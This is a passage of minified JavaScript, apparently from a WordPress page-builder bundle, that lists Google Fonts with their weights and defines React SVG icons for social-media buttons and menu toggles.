Ramakrishna",v:[400],f:"sans-serif"},{n:"Tenor Sans",v:[400],f:"sans-serif"},{n:"Text Me One",v:[400],f:"sans-serif"},{n:"Texturina",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Thasadith",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"The Girl Next Door",v:[400],f:"handwriting"},{n:"The Nautigal",v:[400,700],f:"handwriting"},{n:"Tienne",v:[400,700,900],f:"serif"},{n:"Tillana",v:[400,500,600,700,800],f:"handwriting"},{n:"Timmana",v:[400],f:"sans-serif"},{n:"Tinos",v:[400,"400i",700,"700i"],f:"serif"},{n:"Titan One",v:[400],f:"display"},{n:"Titillium Web",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i",900],f:"sans-serif"},{n:"Tomorrow",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Tourney",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"Trade Winds",v:[400],f:"display"},{n:"Train One",v:[400],f:"display"},{n:"Trirong",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Trispace",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Trocchi",v:[400],f:"serif"},{n:"Trochut",v:[400,"400i",700],f:"display"},{n:"Truculenta",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Trykker",v:[400],f:"serif"},{n:"Tulpen One",v:[400],f:"display"},{n:"Turret Road",v:["200","300",400,500,700,800],f:"display"},{n:"Twinkle Star",v:[400],f:"handwriting"},{n:"Tai Heritage Pro",v:[400,700],f:"serif"},{n:"Tilt Neon",v:[400],f:"display"},{n:"Tilt Prism",v:[400],f:"display"},{n:"Tilt Warp",v:[400],f:"display"},{n:"Tiro Bangla",v:[400,"400i"],f:"serif"},{n:"Tiro Devanagari Hindi",v:[400,"400i"],f:"serif"},{n:"Tiro Devanagari Marathi",v:[400,"400i"],f:"serif"},{n:"Tiro Devanagari Sanskrit",v:[400,"400i"],f:"serif"},{n:"Tiro Gurmukhi",v:[400,"400i"],f:"serif"},{n:"Tiro Kannada",v:[400,"400i"],f:"serif"},{n:"Tiro Tamil",v:[400,"400i"],f:"serif"},{n:"Tiro Telugu",v:[400,"400i"],f:"serif"},{n:"Tsukimi Rounded",v:[300,400,500,600,700],f:"sans-serif"},{n:"Ubuntu",v:["300","300i",400,"400i",500,"500i",700,"700i"],f:"sans-serif"},{n:"Ubuntu Condensed",v:[400],f:"sans-serif"},{n:"Ubuntu Mono",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Uchen",v:[400],f:"serif"},{n:"Ultra",v:[400],f:"serif"},{n:"Uncial Antiqua",v:[400],f:"display"},{n:"Underdog",v:[400],f:"display"},{n:"Unica One",v:[400],f:"display"},{n:"UnifrakturCook",v:[700],f:"display"},{n:"UnifrakturMaguntia",v:[400],f:"display"},{n:"Unkempt",v:[400,700],f:"display"},{n:"Unlock",v:[400],f:"display"},{n:"Unna",v:[400,"400i",700,"700i"],f:"serif"},{n:"Updock",v:[400],f:"handwriting"},{n:"Urbanist",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Unbounded",v:[200,300,400,500,600,700,800,900],f:"display"},{n:"VT323",v:[400],f:"monospace"},{n:"Vampiro One",v:[400],f:"display"},{n:"Varela",v:[400],f:"sans-serif"},{n:"Varela Round",v:[400],f:"sans-serif"},{n:"Varta",v:["300",400,500,600,700],f:"sans-serif"},{n:"Vast Shadow",v:[400],f:"display"},{n:"Vazirmatn",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Vesper Libre",v:[400,500,700,900],f:"serif"},{n:"Viaoda Libre",v:[400],f:"display"},{n:"Vibes",v:[400],f:"display"},{n:"Vibur",v:[400],f:"handwriting"},{n:"Vidaloka",v:[400],f:"serif"},{n:"Viga",v:[400],f:"sans-serif"},{n:"Voces",v:[400],f:"display"},{n:"Volkhov",v:[400,"400i",700,"700i"],f:"serif"},{n:"Vollkorn",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Vollkorn SC",v:[400,600,700,900],f:"serif"},{n:"Voltaire",v:[400],f:"sans-serif"},{n:"Vujahday Script",v:[400],f:"handwriting"},{n:"Vina Sans",v:[400],f:"display"},{n:"Waiting for the Sunrise",v:[400],f:"handwriting"},{n:"Wallpoet",v:[400],f:"display"},{n:"Walter Turncoat",v:[400],f:"handwriting"},{n:"Warnes",v:[400],f:"display"},{n:"Water Brush",v:[400],f:"handwriting"},{n:"Waterfall",v:[400],f:"handwriting"},{n:"Wellfleet",v:[400],f:"display"},{n:"Wendy One",v:[400],f:"sans-serif"},{n:"Whisper",v:[400],f:"handwriting"},{n:"WindSong",v:[400,500],f:"handwriting"},{n:"Wire One",v:[400],f:"sans-serif"},{n:"Work Sans",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Wix Madefor Display",v:[400,500,600,700,800],f:"sans-serif"},{n:"Wix Madefor Text",v:[400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Xanh Mono",v:[400,"400i"],f:"monospace"},{n:"Yaldevi",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Yanone Kaffeesatz",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Yantramanav",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Yatra One",v:[400],f:"display"},{n:"Yellowtail",v:[400],f:"handwriting"},{n:"Yeon Sung",v:[400],f:"display"},{n:"Yeseva One",v:[400],f:"display"},{n:"Yesteryear",v:[400],f:"handwriting"},{n:"Yomogi",v:[400],f:"handwriting"},{n:"Yrsa",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"serif"},{n:"Yuji Boku",v:[400],f:"serif"},{n:"Yuji Mai",v:[400],f:"serif"},{n:"Yuji Syuku",v:[400],f:"serif"},{n:"Yusei Magic",v:[400],f:"sans-serif"},{n:"Ysabeau",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"ZCOOL KuaiLe",v:[400],f:"sans-serif"},{n:"ZCOOL QingKe HuangYou",v:[400],f:"sans-serif"},{n:"ZCOOL XiaoWei",v:[400],f:"sans-serif"},{n:"Zen Antique",v:[400],f:"serif"},{n:"Zen Antique Soft",v:[400],f:"serif"},{n:"Zen Dots",v:[400],f:"display"},{n:"Zen Kaku Gothic Antique",v:["300",400,500,700,900],f:"sans-serif"},{n:"Zen Kaku Gothic New",v:["300",400,500,700,900],f:"sans-serif"},{n:"Zen Kurenaido",v:[400],f:"sans-serif"},{n:"Zen Loop",v:[400,"400i"],f:"display"},{n:"Zen Maru Gothic",v:["300",400,500,700,900],f:"sans-serif"},{n:"Zen Old Mincho",v:[400,500,600,700,900],f:"serif"},{n:"Zen Tokyo Zoo",v:[400],f:"display"},{n:"Zeyada",v:[400],f:"handwriting"},{n:"Zhi Mang Xing",v:[400],f:"handwriting"},{n:"Zilla Slab",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Zilla Slab Highlight",v:[400,700],f:"display"}]},83245:(e,t,l)=>{"use strict";l.d(t,{T0:()=>a,ZP:()=>n});var o=l(67294);const a={subtract:(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),plus:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M12 19.8c-.4 0-.8-.3-.8-.8v-6.2H5c-.4 0-.8-.3-.8-.8s.3-.8.8-.8h6.2V5c0-.4.3-.8.8-.8s.8.3.8.8v6.2H19c.4 0 .8.3.8.8s-.3.8-.8.8h-6.2V19c0 .4-.4.8-.8.8z"})),skype:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 100 99.964"},(0,o.createElement)("path",{d:"M97.637 61.79a3.8 3.8 0 0 1-.265-2.338c2.854-16.467-1.618-30.679-13.443-42.449A46.289 46.289 0 0 0 57.307 3.971a45.987 45.987 0 0 0-13.429.031 3.88 3.88 0 0 1-2.678-.468 27.868 27.868 0 0 0-37.106 9.469 27.009 27.009 0 0 0-.722 27.349 2.2 2.2 0 0 1 .268 1.577c-4.109 21.989 7.627 42.639 27.735 51.084a48.685 48.685 0 0 0 26.784 3.2 3.168 3.168 0 0 1 2.058.3 28.253 28.253 0 0 0 14.99 3.392 24.78 24.78 0 0 0 10.7-3.344 28.036 28.036 0 0 0 13.784-19.714 26.476 26.476 0 0 0-2.054-15.057Zm-22.9 2.118c-1.145 6.065-5.1 9.919-10.639 12.005a34.579 34.579 0 0 1-25.014.047 17.5 17.5 0 0 1-10.124-9.767 10.7 10.7 0 0 1-.823-3.5 4.786 4.786 0 0 1 2.69-4.8 5.42 5.42 0 0 1 5.954.641 8.434 8.434 0 0 1 1.858 2.609c.575 1.166 1.117 2.344 1.763 3.477a10.145 10.145 0 0 0 8.116 5.239c3.849.439 7.6.181 11.051-1.866 3.034-1.8 4.327-4.8 3.344-7.958a6.789 6.789 0 0 0-3.821-3.96 36.8 36.8 0 0 0-8.484-2.527c-4.659-1.075-9.32-2.134-13.636-4.306-6.146-3.093-8.925-8.983-7.25-15.629a12.974 12.974 0 0 1 5.917-7.83 26.362 26.362 0 0 1 12.494-3.723c1.1-.089 2.212-.11 2.953-.145 5.344.04 10.179.739 14.54 3.347 3.038 1.816 5.483 4.183 6.521 7.712a5.465 5.465 0 0 1-1.221 5.8 5.212 5.212 0 0 1-8.142-.932c-.8-1.185-1.506-2.436-2.312-3.618a9.062 9.062 0 0 0-6.6-4.222c-3.583-.437-7.092-.415-10.344 1.435a5.654 5.654 0 0 0-3.072 3.721c-.446 2.16.408 3.849 2.36 5.136 2.449 1.616 5.253 2.209 8.032 2.887a123.979 123.979 0 0 1 12.525 3.358 19.776 19.776 0 0 1 8.3 4.956c3.252 3.573 3.917 7.862 3.06 12.414Z"})),link:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M10 17.389H8.444A5.194 5.194 0 1 1 8.444 7H10v1.5H8.444a3.694 3.694 0 0 0 0 7.389H10v1.5ZM14 7h1.556a5.194 5.194 0 0 1 0 10.39H14v-1.5h1.556a3.694 3.694 0 0 0 0-7.39H14V7Zm-4.5 6h5v-1.5h-5V13Z"})),facebook:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50 50"},(0,o.createElement)("path",{d:"M50 4.4v41.1c0 2.5-2 4.4-4.4 4.4H34.5V31.1c0-.4.1-.6.5-.5h5.4c.4 0 .6 0 .6-.5.3-2.3.6-4.6.9-7 0-.4-.1-.4-.4-.4h-6.6c-.3 0-.5-.1-.5-.4v-4.8c-.1-1.5 1-2.9 2.6-3H41.6c.3 0 .4-.1.4-.4V7.9c0-.4-.1-.4-.5-.4-1.5 0-6.7 0-7.8.2-4 .7-6.9 4-7.2 8.1-.1 2.2 0 4.4 0 6.6 0 .5-.1.6-.6.6h-5.5c-.3 0-.4.1-.4.4v7c0 .3.1.4.4.4h5.5c.5 0 .6.1.6.6v18.8H4.4C2 50 0 48 0 45.5V4.4C0 2 2 0 4.4 0h41.1C48 0 50 2 50 4.4z"})),twitter:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M17.7512 3H20.818L14.1179 10.6246L22 21H15.8284L10.9946 14.7074L5.46359 21H2.39494L9.5613 12.8446L2 3H8.32828L12.6976 8.75169L17.7512 3ZM16.6748 19.1723H18.3742L7.4049 4.73169H5.58133L16.6748 19.1723Z"})),tiktok_lite_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 35.699 50"},(0,o.createElement)("path",{d:"M27.638 5.514A13.716 13.716 0 0 1 26.162 0h-6.835v28.914a6.244 6.244 0 1 1-6.241-6.247 6.086 6.086 0 0 1 1.965.32v-7.002a12.836 12.836 0 0 0-1.965-.149A13.082 13.082 0 1 0 26.16 28.918V14.134a17.847 17.847 0 0 0 10.454 3.277l.162-6.834c-4.405-.105-7.4-1.761-9.14-5.063"})),tiktok_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0m11.606 21.714a11.347 11.347 0 0 1-6.656-2.086v9.413a8.323 8.323 0 1 1-7.076-8.236v4.461a3.9 3.9 0 0 0-1.251-.2 3.978 3.978 0 1 0 3.974 3.977V10.628h4.353a8.761 8.761 0 0 0 .94 3.514c1.112 2.1 3.015 3.156 5.821 3.223Z"})),instagram_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 44 44"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M30.889 22a8.883 8.883 0 0 1-8.976 8.888A8.932 8.932 0 1 1 30.889 22"}),(0,o.createElement)("path",{d:"M22 0C1.18 0 0 1.179 0 22s1.18 22 22 22 22-1.179 22-22S42.821 0 22 0m0 35.816A13.818 13.818 0 1 1 35.816 22 13.817 13.817 0 0 1 22 35.816m14.362-24.948a3.194 3.194 0 0 1-3.256-3.256 3.248 3.248 0 0 1 3.256-3.256 3.175 3.175 0 0 1 3.168 3.256 3.123 3.123 0 0 1-3.168 3.256"}))),linkedin:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 42 42"},(0,o.createElement)("path",{d:"M37.53 0H4.47A4.468 4.468 0 0 0 0 4.47v33.06A4.468 4.468 0 0 0 4.47 42h33.06A4.468 4.468 0 0 0 42 37.53V4.47A4.468 4.468 0 0 0 37.53 0M12.49 35.12c0 .51-.09.59-.59.59H6.87c-.5 0-.59-.17-.59-.59V16.43c0-.5.09-.67.67-.67h5.03c.42 0 .59.08.59.59-.08 6.28-.08 12.49-.08 18.77m-3.1-22.04a3.583 3.583 0 0 1-3.61-3.61 3.626 3.626 0 0 1 3.61-3.6 3.572 3.572 0 0 1 3.6 3.6 3.692 3.692 0 0 1-3.6 3.61m25.65 22.63h-4.78c-.5 0-.75-.08-.75-.67v-9.3a13.485 13.485 0 0 0-.26-2.6 2.664 2.664 0 0 0-2.43-2.35 3.264 3.264 0 0 0-3.69 1.68 6.537 6.537 0 0 0-.58 2.51v9.98c0 .67-.17.84-.84.75-1.59-.08-3.19 0-4.78 0-.42 0-.59-.17-.59-.59V16.35c0-.42.09-.59.51-.59h4.86c.42 0 .5.17.5.5v2.1a7.617 7.617 0 0 1 3.69-2.77 8.813 8.813 0 0 1 6.2.51 5.948 5.948 0 0 1 3.11 4.44 20.4 20.4 0 0 1 .42 3.94v10.56c.08.59-.09.67-.59.67"})),whatsapp:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 44 44.26"},(0,o.createElement)("path",{d:"M22.311 0A21.555 21.555 0 0 0 .798 21.6a22.259 22.259 0 0 0 3.01 11.067l-3.807 11.6 11.951-3.805A21.656 21.656 0 0 0 44 21.517 21.687 21.687 0 0 0 22.311 0m10.637 29.915a5.156 5.156 0 0 1-3.487 2.414c-4.559.983-9.387-2.593-12.338-5.633a22.894 22.894 0 0 1-5.275-8.046c-.983-2.861.358-8.583 4.381-7.689.984.179 1.163 1.073 1.431 1.878.447 1.162.8 2.235 1.251 3.4a1.514 1.514 0 0 1 0 .894c-.357.805-1.162 1.341-1.7 2.056-.805 1.252 2.324 4.292 3.218 5.1 1.163 1.072 2.951 2.682 4.56 2.861.894.089 2.056-1.7 2.5-2.325.358-.447.626-.536 1.073-.358 1.52.626 2.951 1.52 4.47 2.325a.811.811 0 0 1 .537.983 3.565 3.565 0 0 1-.626 2.146"})),wordpress_lite_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0M2.724 24a21.149 21.149 0 0 1 1.844-8.657L14.716 43.15A21.283 21.283 0 0 1 2.724 24M24 45.278a21.317 21.317 0 0 1-6.01-.865l6.384-18.55 6.538 17.917a1.806 1.806 0 0 0 .154.293 21.224 21.224 0 0 1-7.066 1.2m2.931-31.249c1.282-.065 2.436-.2 2.436-.2a.88.88 0 0 0-.135-1.754s-3.447.272-5.671.272c-2.09 0-5.6-.272-5.6-.272a.88.88 0 0 0-.133 1.754s1.084.136 2.23.2l3.317 9.084-4.657 13.963-7.754-23.047a42.05 42.05 0 0 0 2.436-.2.88.88 0 0 0-.135-1.754s-3.447.272-5.671.272c-.4 0-.871-.009-1.371-.025a21.273 21.273 0 0 1 32.144-4.006c-.093-.006-.182-.015-.275-.015a3.682 3.682 0 0 0-3.573 3.774c0 1.754 1.01 3.237 2.091 4.991a11.211 11.211 0 0 1 1.754 5.869 24.615 24.615 0 0 1-1.547 7.014l-2.2 6.952Zm7.764 28.366 6.5-18.788a20.025 20.025 0 0 0 1.618-7.62 16.1 16.1 0 0 0-.142-2.189 21.276 21.276 0 0 1-7.974 28.6"})),wordpress_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M4 23.999a20 20 0 0 0 11.272 18L5.732 15.86A19.923 19.923 0 0 0 4 24m33.5-1.009a10.531 10.531 0 0 0-1.646-5.517c-1.014-1.648-1.964-3.042-1.964-4.69a3.463 3.463 0 0 1 3.358-3.55c.089 0 .173.011.259.016A20 20 0 0 0 7.29 13.013c.47.015.912.025 1.288.025 2.091 0 5.33-.254 5.33-.254a.827.827 0 0 1 .128 1.648s-1.084.127-2.289.19l7.283 21.664 4.378-13.127-3.117-8.535c-1.078-.063-2.1-.19-2.1-.19a.827.827 0 0 1 .127-1.648s3.3.254 5.267.254c2.092 0 5.331-.254 5.331-.254a.827.827 0 0 1 .128 1.648s-1.085.127-2.289.19l7.228 21.5 2.063-6.538a23.047 23.047 0 0 0 1.454-6.593m-13.146 2.755-6 17.437a20.006 20.006 0 0 0 12.292-.319 1.835 1.835 0 0 1-.143-.276Zm17.2-11.344a15.342 15.342 0 0 1 .134 2.057 18.884 18.884 0 0 1-1.524 7.163l-6.11 17.661a20 20 0 0 0 7.5-26.881"}),(0,o.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0m0 46.56A22.56 22.56 0 1 1 46.56 24 22.559 22.559 0 0 1 24 46.56"}))),youtube_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 33.86"},(0,o.createElement)("path",{d:"M47.134 5.29a5.893 5.893 0 0 0-4.232-4.232C39.055 0 24.05 0 24.05 0S9.044 0 5.293.962A6.146 6.146 0 0 0 .965 5.29C.003 9.041.003 16.929.003 16.929s0 7.887.962 11.638A5.894 5.894 0 0 0 5.197 32.8c3.847 1.058 18.853 1.058 18.853 1.058s15.005 0 18.756-1.058a6.059 6.059 0 0 0 4.232-4.233C48 24.816 48 16.929 48 16.929s.1-7.888-.866-11.639M19.141 21.928v-10a1.237 1.237 0 0 1 1.845-1.077l8.85 5a1.237 1.237 0 0 1 0 2.153l-8.85 5a1.237 1.237 0 0 1-1.845-1.077"})),pinterest:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M48.004 23.995a24 24 0 0 1-24 24.005 23.735 23.735 0 0 1-10.948-2.65h.086a15.084 15.084 0 0 0 4.8-6.914 35.685 35.685 0 0 0 1.729-7.009v-.192c.1-.384.192-.384.48-.192.1 0 .1.1.192.1a7.385 7.385 0 0 0 4.322 2.112 11.879 11.879 0 0 0 7.491-.96 16.739 16.739 0 0 0 4.513-3.649 11.277 11.277 0 0 0 1-1.354 17.413 17.413 0 0 0 2.574-7.278 16.381 16.381 0 0 0-1.1-8.555 13.1 13.1 0 0 0-4.774-5.569 17.523 17.523 0 0 0-8.067-2.977A20.935 20.935 0 0 0 15.45 4.065a15.91 15.91 0 0 0-9.028 8.258 11.865 11.865 0 0 0-.288 9.89 8.5 8.5 0 0 0 5.859 4.993c.288.1.384 0 .384-.288.192-1.056.384-2.112.576-3.073 0-.192 0-.384-.192-.48a8.869 8.869 0 0 1-1.825-2.688 6.966 6.966 0 0 1 .1-5.377 12.226 12.226 0 0 1 7.875-7.778 14.92 14.92 0 0 1 7.4-.672c5.475.912 7.914 6.625 7.559 11.685a15.147 15.147 0 0 1-2.757 7.423 7.589 7.589 0 0 1-4.129 2.976 5.108 5.108 0 0 1-4.226-.768 2.864 2.864 0 0 1-1.153-2.3 9.668 9.668 0 0 1 .769-3.745c.48-1.44 1.056-2.785 1.44-4.225a10.787 10.787 0 0 0 .384-3.072 3.408 3.408 0 0 0-4.206-2.977 5.336 5.336 0 0 0-2.641 1.364c-1.892 1.785-2.4 5.175-1.6 7.566a7.772 7.772 0 0 1-.1 4.9c-.864 2.976-1.825 6.049-2.5 9.122a28.284 28.284 0 0 0-.672 7.489 8.268 8.268 0 0 0 .576 3.063 24 24 0 1 1 34.949-21.356"})),reddit:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 45.85 48"},(0,o.createElement)("path",{d:"M44.492 25.179a6.625 6.625 0 0 0 .192-7.766 6.482 6.482 0 0 0-9.492-1.151c-.192.1-.288.192-.384.1a28.339 28.339 0 0 0-9.684-2.493c-.192 0-.287-.095-.192-.287.288-.959.672-1.822 1.055-2.781a29.239 29.239 0 0 1 3.068-5.657 7.62 7.62 0 0 1 2.017-1.919 2.338 2.338 0 0 1 2.493 0 6.138 6.138 0 0 1 1.246.959c.192.191.192.287.192.575a3.868 3.868 0 0 0 3.26 4.506 3.786 3.786 0 0 0 4.309-3.739 3.8 3.8 0 0 0-5.463-3.547.358.358 0 0 1-.479-.1 4.481 4.481 0 0 0-1.151-.863 5.486 5.486 0 0 0-6.232-.1 14.609 14.609 0 0 0-3.26 3.643 38.376 38.376 0 0 0-4.123 9.013c-.1.287-.192.383-.479.383a26.861 26.861 0 0 0-10.163 2.493c-.192.1-.288.1-.48-.1a6.631 6.631 0 0 0-8.054-.383 6.539 6.539 0 0 0-1.246 9.4c.192.192.192.288.1.479a13.425 13.425 0 0 0-.959 3.74 14.384 14.384 0 0 0 2.3 8.821 20.414 20.414 0 0 0 7.191 6.519 27.739 27.739 0 0 0 12.752 3.069 27.311 27.311 0 0 0 12.464-2.781 19.211 19.211 0 0 0 7.282-5.933c3.068-4.219 3.835-8.725 1.822-13.615a.865.865 0 0 1 .1-.48m-12.656 5.421a3.645 3.645 0 1 1 3.024-3.023 3.646 3.646 0 0 1-3.024 3.023m-.192 8.1a14.556 14.556 0 0 1-9.013 3.26 14.886 14.886 0 0 1-8.533-3.164 1.469 1.469 0 1 1 1.822-2.3 11.081 11.081 0 0 0 7.862 2.493 11.805 11.805 0 0 0 5.369-2.014c.288-.191.479-.383.767-.575a1.488 1.488 0 0 1 2.014.288 1.6 1.6 0 0 1-.288 2.013m-16.683-15.34a3.646 3.646 0 1 1-3.644 3.643 3.526 3.526 0 0 1 3.644-3.643m-12.464.767a4.959 4.959 0 0 1 7.095-6.808 18.573 18.573 0 0 0-7.095 6.808m41.036-.288a18.259 18.259 0 0 0-6.807-6.424c-.1-.1-.192-.1-.288-.192a5.75 5.75 0 0 1 2.4-.959 4.811 4.811 0 0 1 4.794 2.206 4.978 4.978 0 0 1 .1 5.273c0 .1-.1.384-.192.1"})),google_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 47.04 48"},(0,o.createElement)("path",{d:"M24 19.625v8.907h13.227a11.731 11.731 0 0 1-4.907 7.786 14.2 14.2 0 0 1-8.32 2.4 14.447 14.447 0 0 1-13.653-9.973 14.764 14.764 0 0 1-.8-4.747 15.523 15.523 0 0 1 .773-4.746A14.507 14.507 0 0 1 24 9.278a13.3 13.3 0 0 1 9.28 3.574l6.773-6.614A23.061 23.061 0 0 0 24-.002a24 24 0 0 0 0 48 22.873 22.873 0 0 0 15.893-5.813c4.534-4.187 7.147-10.347 7.147-17.653a20.536 20.536 0 0 0-.507-4.907Z"}))},i={hamicon_1:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{"fill-rule":"evenodd",d:"M3.25 6c0-.41.34-.75.75-.75h16a.75.75 0 0 1 0 1.5H4A.75.75 0 0 1 3.25 6ZM3.25 12c0-.41.34-.75.75-.75h12a.75.75 0 0 1 0 1.5H4a.75.75 0 0 1-.75-.75ZM3.25 18c0-.41.34-.75.75-.75h16a.75.75 0 0 1 0 1.5H4a.75.75 0 0 1-.75-.75Z","clip-rule":"evenodd"})),hamicon_2:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{"fill-rule":"evenodd",d:"M3.25 6c0-.41.34-.75.75-.75h16a.75.75 0 0 1 0 1.5H4A.75.75 0 0 1 3.25 6ZM3.25 12c0-.41.34-.75.75-.75h16a.75.75 0 0 1 0 1.5H4a.75.75 0 0 1-.75-.75ZM3.25 18c0-.41.34-.75.75-.75h16a.75.75 0 0 1 0 1.5H4a.75.75 0 0 1-.75-.75Z","clip-rule":"evenodd"})),hamicon_3:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{"fill-rule":"evenodd",d:"M3.25 6c0-.41.34-.75.75-.75h16a.75.75 0 0 1 0 1.5H4A.75.75 0 0 1 3.25 6ZM3.25 12c0-.41.34-.75.75-.75h12a.75.75 0 0 1 0 1.5H4a.75.75 0 0 1-.75-.75ZM3.25 18c0-.41.34-.75.75-.75h8a.75.75 0 0 1 0 1.5H4a.75.75 0 0 1-.75-.75Z","clip-rule":"evenodd"})),hamicon_4:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M4.5 5.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1ZM4.5 11.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1ZM4.5 17.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1ZM10.5 5.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1ZM10.5 11.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1ZM10.5 17.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1ZM16.5 5.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1ZM16.5 11.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1ZM16.5 17.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1Z"})),hamicon_5:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{"fill-rule":"evenodd",d:"M19 19.25H5v-2.5h14v2.5ZM19 13.25H5v-2.5h14v2.5ZM19 7.25H5v-2.5h14v2.5Z","clip-rule":"evenodd"})),hamicon_6:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{"fill-rule":"evenodd",d:"M12 11.75a.25.25 0 1 0 0 .5.25.25 0 0 0 0-.5Zm-1.75.25a1.75 1.75 0 1 1 3.5 0 1.75 1.75 0 0 1-3.5 0ZM12 4.75a.25.25 0 1 0 0 .5.25.25 0 0 0 0-.5ZM10.25 5a1.75 1.75 0 1 1 3.5 0 1.75 1.75 0 0 1-3.5 0ZM12 18.75a.25.25 0 1 0 0 .5.25.25 0 0 0 0-.5Zm-1.75.25a1.75 1.75 0 1 1 3.5 0 1.75 1.75 0 0 1-3.5 0Z","clip-rule":"evenodd"}))},n={angle_bottom_left_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 32.6 32.75"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M2.55 32.254H.5V2.704a2.05 2.05 0 0 1 4.1 0v22.55l24-24a2.05 2.05 0 1 1 2.9 2.9l-24 24h22.55a2.05 2.05 0 1 1 0 4.1Z"})),angle_bottom_right_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 32.6 